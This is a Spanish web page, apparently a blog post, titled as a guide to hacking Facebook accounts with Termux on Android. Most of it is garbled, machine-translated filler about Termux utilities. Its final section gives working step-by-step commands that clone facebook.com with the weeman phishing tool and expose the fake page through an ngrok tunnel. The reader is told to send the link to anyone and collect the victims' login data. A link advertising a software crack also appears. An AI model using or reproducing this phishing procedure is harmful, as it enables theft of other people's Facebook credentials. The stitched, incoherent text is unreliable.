Como Hackear Facebook con termux desde tu android SIN ROOT

Como hackear Facebook con termux fuera de la red local, en este post te mostraremos como realizarlo desde tu teléfono Android. Actualmente los dispositivos android estan basados en linux por la que termux se ejecuta desde la linux y se puede instalar programas como python etc.

Utilice termux para hackear Facebook desde fuera de la red local.

En facebook termux, podemos usar termux dede para violar Android es un sistema operativo muy poderoso, y cada vez hay más aplicaciones cerca del escritorio. Sin embargo, a veces aún necesita trabajar duro para implementar algunas cosas que son fáciles en el escritorio de Android. Afortunadamente, Android es el núcleo de Linux. Termux se basa en la infraestructura existente. Proporciona un entorno de línea de comandos y le permite instalar aplicaciones Linux honestas en su dispositivo Android. Busquemos algo.

¿Por qué usar Facebook Termux?

Ya existen algunas aplicaciones en Play Store que son puertos de aplicaciones de Linux para Android. Estos se diferencian de Termux en que replican estas aplicaciones de Linux, pero se hacen "al modo de Android". Por el contrario, Termux es un entorno Linux independiente. Su procedimiento (para todos los propósitos y propósitos) es exactamente el mismo que el de Linux. En comparación con las aplicaciones trasplantadas, esto tiene algunas ventajas:

  • Coherencia: debe proporcionarse algún tipo de interfaz de usuario para las aplicaciones de Linux que se hayan migrado a Android. La experiencia del usuario en Android depende en gran medida del esfuerzo invertido por los desarrolladores. En cualquier caso, la situación será diferente. Pero la aplicación Termux es la misma que la versión de Linux, desde los atajos de teclado hasta los métodos de instalación.
  • Compacto: agregar el "código de Android" anterior puede hacer que ciertas aplicaciones delgadas sean más gruesas. Tome un cliente SSH de Android (como VX ConnectBot) como ejemplo. Su tamaño puede oscilar entre 2 MB y 12 MB. Sin embargo, con la excepción de algunas pantallas gráficas, eventualmente ingresará a una terminal, como se muestra en la figura siguiente. Comparándolo con dropbear en Termux, el peso instalado es 396 KB (es decir, kilobytes). Y proporciona un servidor SSH para comenzar.
  • Puntualidad: al actualizar una aplicación, aún dejará que el desarrollador de la aplicación de Android decida si desea actualizar. Por el contrario, la aplicación Termux es un paquete de software Linux bastante estándar y requiere menos trabajo. Incluso se pueden crear automáticamente con la versión de escritorio. Con Termux, puede tener un acceso más rápido a las nuevas funciones.
  • Precio: por supuesto, cualquier aplicación que compre en Play Store se puede cobrar en consecuencia. Todas las aplicaciones de Termux son gratuitas (y de código abierto), al igual que Termux.
Terminal de texmux en Android

ROOT FALSO EN TERMUX ANDROID.(Opens in a new browser tab)

El primer paso es utilizar Facebook comandos Termux.

Antes de ponerlo en uso, pongamos algo en él. Termux es, ante todo, un entorno de línea de comandos. Aquí no se puede encontrar una hermosa interfaz de usuario con botones brillantes. Esto se aplica no solo al paquete de software básico de Termux, sino también a sus aplicaciones. No obtendrá una versión más reciente de LibreOffice. También debe estar familiarizado con la línea de comandos para instalar y utilizar estos programas. Si es un novato, le proporcionaremos algunos recursos útiles.

Puede leer comandos básicos, los más de 40 comandos de terminal usados , cómo enseñarte comandos de terminal y sitios web y libros que pueden brindarte más información .

En otras palabras, el proceso de instalación del programa es muy sencillo. Termux usa el mismo instalador de paquetes disponible en Debian y Ubuntu Linux, llamado Advanced Packaging Tool (APT). Para ver las aplicaciones disponibles, abra Termux y escriba lo siguiente cuando se le solicite:

  1. apt-list:
    Esto muestra una lista de todos los paquetes , o paquetes de software, que puede instalar. Si desea algunos detalles en uno, simplemente escríbalo e incluya su nombre:
  2. apt show [app name]
    Mostrará un breve resumen del paquete, como se muestra en el editor de texto de Emacs arriba. Finalmente, para instalar, simplemente use el siguiente comando:Para obtener información más detallada, como la actualización de paquetes, consulte nuestra guía para usar APT. Una vez completada la instalación, puede iniciar el programa escribiendo su nombre en el indicador. La captura de pantalla a continuación muestra el editor de texto nano ejecutándose después de la instalación anterior.
  3. Una guía para principiantes para instalar software en Ubuntu usando APT Una guía para principiantes para instalar software en Ubuntu usando APT Si alguna vez ha usado Ubuntu, es posible que haya usado el comando apt en algún momento, pero sabe que es además de apt-get install . Leer mas... Ahora, echemos un vistazo a algunas de las herramientas útiles que puede obtener a través de Termux.ROOT FALSO EN TERMUX ANDROID.(Opens in a new browser tab)
hackear facebook con termux

Utilidades de Core Linux.

Una vez que se instala facebok Termux, puede hacer algunas cosas hermosas de inmediato. La aplicación básica le permitirá usar utilidades básicas de Linux para realizar actividades como copiar (usando el comando cp) y mover archivos (mv), leer el contenido del directorio (ls) y eliminar contenido (rm).

Cómo administrar archivos en la terminal y el escritorio de Linux Cómo administrar los archivos en la terminal y el escritorio de Linux Después de cambiar a Linux, encontrará un escritorio receptivo fácil de usar, desde la instalación de nuevas aplicaciones y su ejecución hasta la organización de su información. Leer Mas...

Con el administrador de archivos de Android, no hay nada que pueda hacer, ¿verdad? Bueno, Termux también incluye el comando "enlace" (ln). Esto será útil de inmediato: de forma predeterminada, Termux le permite trabajar en el directorio /data/data/com.termux/files/home, que no es donde están el resto de los archivos (normalmente / sdcard). Sin embargo, puede crear un nuevo enlace simbólico en este directorio (por ejemplo, /data/data/com.termux/files/home/documents/sdcard/Documents).

Facebook termux Esto le permitirá navegar rápidamente a estos archivos:

Reemplazar: Los comandos de administración de archivos en la instalación básica de Termux pueden reducir la necesidad de un administrador de archivos separado a menos que tengan características adicionales. La capacidad de vincular entre directorios también puede eliminar aplicaciones dedicadas como "carpetas vinculadas", lo que le permite obtener esta función sin tener que rootear su teléfono.

EDITORES DE TEXTO.

Termux proporciona las últimas versiones de dos editores de texto "principales" de Linux: VIM (v8.0, la última versión en el momento de escribir este artículo) y Emacs (v25.2, también la última versión). La imagen de abajo muestra Emacs ejecutándose en la terminal de konsole en Linux (arriba) y Termux (abajo). Tenga en cuenta las similitudes. 7 razones para brindar oportunidades de editor de texto Vim 7 razones para brindar oportunidades de editor de texto Vim Durante muchos años, he probado los editores de texto uno tras otro. Uno de los editores fue mi principal editor diario durante más de dos meses. Leer mas

  • Otros editores como el minimalista nano también están disponibles:

Ahora, Android tiene muchos editores de texto. cuanto más se pueda . Muchos de ellos hacen un muy buen trabajo al guardar y abrir archivos de texto. Sin embargo, muchas de las funciones no se detienen ahí, como si fueran la "aplicación de prueba" de Android del creador. Emacs y VIM son potentes editores de texto. ¿Me gusta Markdown? Ambos lo manejaron bien. ¿Con toda la mentalidad de "no interferencia"? No es nada más atractivo que VIM. ¿Necesitas tomar notas y hacer cosas? El modo de organización en Emacs puede cumplir con sus requisitos. Incluso puede usar Emacs como administrador de archivos, aplicación de scripting, cliente Trello, reproductor de música o jugar al Buscaminas.

Reemplazo: los editores de texto de Android a menudo tienen una función principal: uno puede centrarse en escribir sin distracciones, otro puede obtener una vista previa de Markdown u otros formatos, y el tercero puede guardar comentarios (aunque en realidad es solo un editor de texto. texto). El editor basado en el antiguo terminal puede satisfacer estas necesidades en un programa, al mismo tiempo que tiene las funciones disponibles en la plataforma de escritorio.

Miracle Box CRACK 2.28 NUEVA VERSION ACTUALIZADA

Utilidades de comando

El paquete Termux incluye muchas utilidades útiles de línea de comandos de Linux:

  • gnuplot – un programa matemático de gráficos
  • imagemagick – un kit de herramientas de manipulación y conversión de imágenes
  • p7zip – una utilidad para archivar / unir para el esquema de compresión 7-Zip
  • unrar – una herramienta diferente de un / archivo para el formato RAR
  • wget – un programa para buscar archivos a través de Internet a través de HTTP o FTP

Reemplazo: un programa independiente dedicado, dependiendo de cuántas de las funciones anteriores necesite. Incluso si hay aplicaciones que manejan todos los formatos de archivos y gráficos, tendrá cinco aplicaciones nuevas para llenar su cajón. Esto es especialmente cierto si necesita utilizar aplicaciones independientes en diferentes formatos.

Servidores

Hemos mostrado cómo convertir su dispositivo Android en un servidor web con aplicaciones específicas. Termux también proporciona servidores web Linux honestos como Apache, nginx y lighttpd. Cómo convertir un dispositivo Android en un servidor web Cómo convertir un dispositivo Android en un servidor web Utilice un teléfono inteligente o tableta Android para organizar su propio servidor web de forma fácil y económica.

¿Por qué debería ejecutar un servidor web en su dispositivo Android?

Además de la programación, recuerde que muchas de las mejores aplicaciones actuales son aplicaciones web. Por ejemplo, si está buscando una aplicación de gestión de proyectos real para ejecutar localmente en el dispositivo, las opciones nativas para Android son tenues. Pero puede instalar nginx, la base de datos PostgreSQL y Python, y usar Taiga. Todos estos no necesitan registrarse para ningún servicio de terceros o alojamiento.

facebook Termux también incluye dropbear, dropbear (como se mencionó anteriormente) proporciona un servidor SSH para iniciar sesión en su teléfono / tableta y transferir archivos al cliente. Esto es útil en situaciones en las que desea intercambiar ciertos archivos con otra computadora y

  1.  no desea utilizar servicios en la nube
  2.  no puede o no puede instalar controladores para conectarse directamente al dispositivo.
  3. Puede iniciar temporalmente el servidor Dropbear, usar el cliente en Windows o macOS, obtener los recursos necesarios a través de la red y luego apagarlo.
  4. Una forma sencilla de utilizar SSH en Windows 4 Una forma sencilla de utilizar SSH en Windows SSH es la solución de facto para acceder de forma segura a terminales remotos en Linux y otros sistemas similares a UNIX. En lugar de descargar un cliente SSH.

Reemplazar con: una aplicación como un servidor PAW gratuito o un servidor Ulti de pago le permite activar el servidor web. Incluso si soy fanático de SSHDroid (como se muestra arriba), la perspectiva de tener un servidor liviano que se pueda iniciar desde la línea de comandos sigue siendo fascinante.

Hackear Facebook con termux desde tu android SIN ROOT(Opens in a new browser tab)

DESARROLLO

Aunque muchas aplicaciones de Android (como los "editores de código") tienen la capacidad de escribir código, es posible que no proporcionen un idioma. Con Termux, puede probar el código directamente en el dispositivo. Proporciona distribuciones estándar de lenguajes de programación, como:

  • BASH shell (el predeterminado disponible de fábrica y una excelente forma de comenzar a piratear )
  • Python (tanto v2 como v3 están disponibles)
  • PHP
  • Rubí

También puede usar los sistemas de control de código fuente git y Subversion, no son solo para desarrollo. Si desea controlar sus datos, puede usar el control de fuente para ocultar el archivo donde lo desee. También puede controlar cuándo se envía la actualización a otros dispositivos, y puede usar "etiquetas" para marcar la versión (si ha nombrado el archivo "mydocument_v12_Aaron's_edit_final_for_real_the_last_one.DOCX", levante la mano).

Reemplazado: hay algunos paquetes de lenguaje de programación para Android, como PHP, QPython o Pocket Ruby. Pero estos proporcionan su propia interfaz de usuario enorme y pueden requerir que otras aplicaciones sean completamente útiles (por ejemplo, servidores basados ​​en Apache usados ​​con PHP). Hay aplicaciones de Android para git, como Pocket Git, que tiene una alta calificación, y aplicaciones basadas en Android para svn, como Open Android SVN Pro. Sin embargo, ninguno es gratuito y debe haber una aplicación separada para cada tipo de control de fuente. Termux proporciona estos dos paquetes de forma gratuita en el mismo paquete. Al utilizar el control de fuente, también puede reducir la cantidad de clientes que se utilizan para los servicios de sincronización en la nube como Dropbox.

Como hackear una cuenta de facebook con termux

termux comandos facebook,  es una aplicación súper compacta que puede abrir muchas funciones para su dispositivo Android. La línea de comandos es una de las características más poderosas de Linux y Termux se basa en el kernel de Linux del dispositivo para mejorar la eficiencia operativa. Quién sabe, tal vez le gusten estas aplicaciones, entonces se le persuadirá para que también utilice el escritorio.

termux comandos hack

Comandos de termux para hackear facebook

Estos son algunos de los comandos para hackear facebook con termux, recordemos seguirlos y verificar cada uno de ellos para no cometer un error al ingresarlos, haga lo siguiente:

  1. cd /sdcard/ (Nombre de la carpeta donde esta tu archivo descomprimido)
  2. ls (con este comando vemos que hay dentro de esa ubicacion)
  3. mv -v /sdcard/MEGA/ngrok /$HOME
  4. ls (vemos que ya no esta ngrok ya se movio)
  5. Abrimos una nueva ventana en termux deslizando para la derecha
  6. ls (vemos que ahi nos aparece la nueva terminal)
  7. chmod +x ngrok (Permisos para ejecucion y escritura)
  8. ls (y vemos que ya esta en verde)
  9. ./ngrok (abrimos ngrok)
  10. Vamos a nuestra cuenta de ngrok en la pagina web y buscamos el token
  11. ngrok authtoken (TOKWN DE TU CUENTA) Lo pegas en la ventana 2 en ngrok

Abrimos una tercera terminar.

  1. apt update (Para actualizar los directorios)
  2. apt upgrade (Actualiza la terminal)
  3. Le ponemos la letra ” y ” y enter para aceptar
  4. apt install python (Instalamos python)
  5. Le ponemos la letra ” y ” y enter para aceptar
  6. apt install python2 (Instalamos python2)
  7. apt install git (Nos va permitir usar el comando git clone)
  8. Le ponemos la letra ” y ” y enter para acepta
  9. git clone https://github.com/evait-security/weeman (Se empieza a descargar weeman
  10. cd weeman (Nos vamos al directorio descargado de weeman
  11. ls (vemos que estan los archivos de weeman)
  12. chmod 777 weeman.py (el comando CHMOD 777 haría que un archivo tuviera todos los permisos para todos los usuarios. )
  13. python2 weeman.py (ejecutamos weeman con python2)
  14. set url http://facebook.com (ponemos la url de facebook)
  15. set action_url http://facebook.com (Clona la pagina )
  16. run (ejecutamos el programa)

 

Nos vamos nueva mente a la terminal 2 donde esta abierto ngrok.

  1. ./ngrok http 8080 (abrimos ngrok con el puerto 8080 que usa weeman)
  2. copiamos el link de forwading y lo mandamos a cualquier persona
  3. Nos vamos a la terminal 3 y ahi nos apareceran los datos del usuario

programas para hackear facebook desde android sin root:

aqui para descargar termux: https://goo.gl/7cZYTH

aqui la pagina de ngrok: https://goo.gl/c66aJm

Últimas noticias, videos y fotos sobre Google.

Deja una respuesta

Subir

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Política de cookies